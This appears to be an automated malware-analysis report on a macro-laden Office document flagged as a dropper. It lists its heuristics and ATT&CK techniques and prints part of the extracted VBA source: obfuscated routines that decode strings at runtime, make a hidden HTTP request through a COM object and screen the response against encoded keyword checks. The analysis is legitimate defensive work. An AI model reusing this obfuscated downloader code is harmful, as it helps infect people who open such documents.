Verdict: MALICIOUS
Risk score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that use the Shell() function to execute commands and CreateObject to interact with system components. The document explicitly prompts the user to enable macros, indicating a lure to bypass security. The VBA script attempts to download a second-stage payload from a constructed URL, which is a common dropper behavior.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-1848766 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1848766
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6073 bytes | 6555c3f803f619be22f217b84c244cbfa782e868688d654a35f5866610209f35 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Run-once guard for the entry routine
Dim vGfGTZ As Boolean

Public Sub zACPgx()
    If vGfGTZ Then Exit Sub
    vGfGTZ = True
    CaOXz
End Sub

' Event-style handler that triggers the entry routine
Public Sub Kophy_Painted(ByVal rgASQ As Long, ByVal cEwMEHX As IInkRectangle)
    zACPgx
End Sub

' Fetches a response body and aborts (Error 205/206) unless it passes the
' substring checks below; the string arguments are decoded at runtime by a()
Public Sub qRxCP()
    DJnlpDa = hfaTr
    If Not JJyTw(DJnlpDa, a("jDNCDwAAOMNIEV", 51, 106)) Then Error 205
    If ICdZB(DJnlpDa, ZeHTx) Then Error 206
End Sub

' Creates a COM object whose ProgID is decoded at runtime, sends an HTTP
' request with decoded headers and returns the response text on status 200
Private Function hfaTr() As String
    Set LnTCqYF = CreateObject(QlYWRXx)
    LnTCqYF.Open uKFlrR, xUAdmLc, mmAoEO
    LnTCqYF.SetRequestHeader a("XUgssehenMrtA-MRA", 88, 137), a("6Nwn .EMeipc0/loRO)5ni .TsdW0 S;bao 4lzeQp.tdT0 oi;7I ltm(.aiMLV0/er;", 163, 622)
    LnTCqYF.SetRequestHeader nnDCn, uvpcMrU
    LnTCqYF.Send
    If 200 = LnTCqYF.Status Then
        hfaTr = LnTCqYF.ResponseText
    End If
End Function

Private Function QlYWRXx() As String
    QlYWRXx = a("nuiqWeVRnpItWtwHKnQi1W..5p.tttsHe", 64, 70)
End Function

Private Function nnDCn() As String
    nnDCn = a("eRIrEgeElfwreE", 95, 15)
End Function

Private Function uvpcMrU() As String
    uvpcMrU = a("staeyspxn-Dsm/ia:ilpJ/no-W/dcafw.adSwctdXwoerh.m-etm/m", 437, 531)
End Function

Private Function xUAdmLc() As String
    xUAdmLc = a("m/eo.Cvmh/.sy/wSimS2itcc:/gwopaC.ntio/mewQ/xi1dpt", 160, 449)
End Function

' Array of decoded strings that the response is tested against
Private Function ZeHTx()
    ZeHTx = Array(a("OEOJlNksTcEhi", 93, 124), a("cRArkratbpHoDKiOSCELUimo", 203, 224), a("cNQjmrwRDePiEpo Ta", 133, 196), a("rwEGTErCkaTk MdnIa", 49, 32), a("ocsicCBToEnq", 23, 28), _
        a("wsrWrCTeJErHV", 112, 92), a("MeAIWscmoteKmsm", 26, 52), a("DMmDGEiiEINUAnC", 37, 106), a(" rkUTPoTEuOnIpGR", 117, 76), a("CyOteniTRoflKJa", 29, 55), _
        a("tnecAtaDMmHNkKkre", 67, 109), a("AltSuutVhwBSUreF", 39, 22), a("uFlRpDVOhCju", 41, 57), a("TrGsLeoWfocNUEGHGSuiN tKeo", 265, 251), a("ZAMAqtOkuDENO", 142, 16), _
        a("oyEMULaTIpSohtj", 29, 72), a("uIeXcGotAoTbCLy", 92, 131), a("aCMkQAixvDcraej", 139, 162), a("tDWishnCogfSeZ", 45, 19), a("HHAgUO svoVshx", 61, 117), _
        a("PLd KLVOAdOkAwtp", 169, 111), a("DIcrcxuAdmteJEdb", 83, 88), a("QTemdNGaTQTRwaEmc", 173, 55), a("ZODRtpnXiUoppCfUo", 168, 56), a("CNJRziCBzsEefY", 19, 65), _
        a("makoNeUOisNFTYgA", 131, 81), a("rwkreiZwEeFkay", 93, 38), a("qkVZXsKROwtenEsidARAPGy", 229, 135), a("BveEGBaIHlSTSgmYas", 133, 104), a("CxLAeEkhnlEswBe", 53, 47), _
        a("mrlVCubGagxVTT", 53, 45), a("RjtOTnSmQOIefCrt", 35, 71), a("iePkmecAPsKCArrh", 95, 77), a("UealPtNaoeSsVRm", 109, 132), a("ERATIwZGhNWHeW", 45, 123), _
        a("ipREyCwrmoTFNiilo", 168, 79), a("kMuCTYzl apvbEOj", 91, 76), a("SEXzlAoCwRUnan", 39, 153), a("sXEZXlJpAjHcar", 67, 101), a("NscqEYsiIkURYiVTe", 143, 146), _
        a("kNrGUTNOzdMvAcEep", 55, 105), a("OrewPIntNfhRorF", 26, 110), a("eFkMoMERVIcNl", 133, 102), a("bdMOs,eeyIeLP tsQ", 25, 126), a("RMevcJCdrYIoinTKR", 181, 133), _
        a("tyOSyoafrAM", 35, 105), a(".sLHEhIDIhCpKEEHS", 61, 168), a("JfkKDEtSOHeRO", 51, 35), a("cUKIegArSnyuuOt", 131, 23), a("aSddgBfRvTNbGEEXiE", 155, 23))
End Function

Private Function mmAoEO() As Boolean
    mmAoEO = False
End Function

Private Function uKFlrR() As String
    uKFlrR = a("bZTEGgtlxV", 109, 64)
End Function

' Case-insensitive "contains" test
Private Function JJyTw(ByVal DjMwzb As String, ByVal anhioZg As String) As Boolean
    qJIIXIK = InStrRev(nmiKPTL(DjMwzb), nmiKPTL(anhioZg))
    JJyTw = qJIIXIK <> ysVlbdd
End Function

Private Function ysVlbdd() As Integer
    ysVlbdd = 0
End Function

Private Function nmiKPTL(ByVal qgAhsjZ As String) As String
    nmiKPTL = LCase(qgAhsjZ)
End Function

' True if any element of the array occurs in the string
Private Function ICdZB(ByVal DjMwzb As String, ByVal BQKxeU) As Boolean
    For Each anhioZg In BQKxeU
        If JJyTw(DjMwzb, anhioZg) Then GoTo yEPjK
    Next
    Exit Function
yEPjK:
    ICdZB = True
End Function

Private Function nFzRRtI(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
    nFzRRtI = aOJBu(iEgcz(qgAhsjZ, qJIIXIK), 1)
End Function

Private Function aOJBu(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
    aOJBu = Rig
```

... (truncated)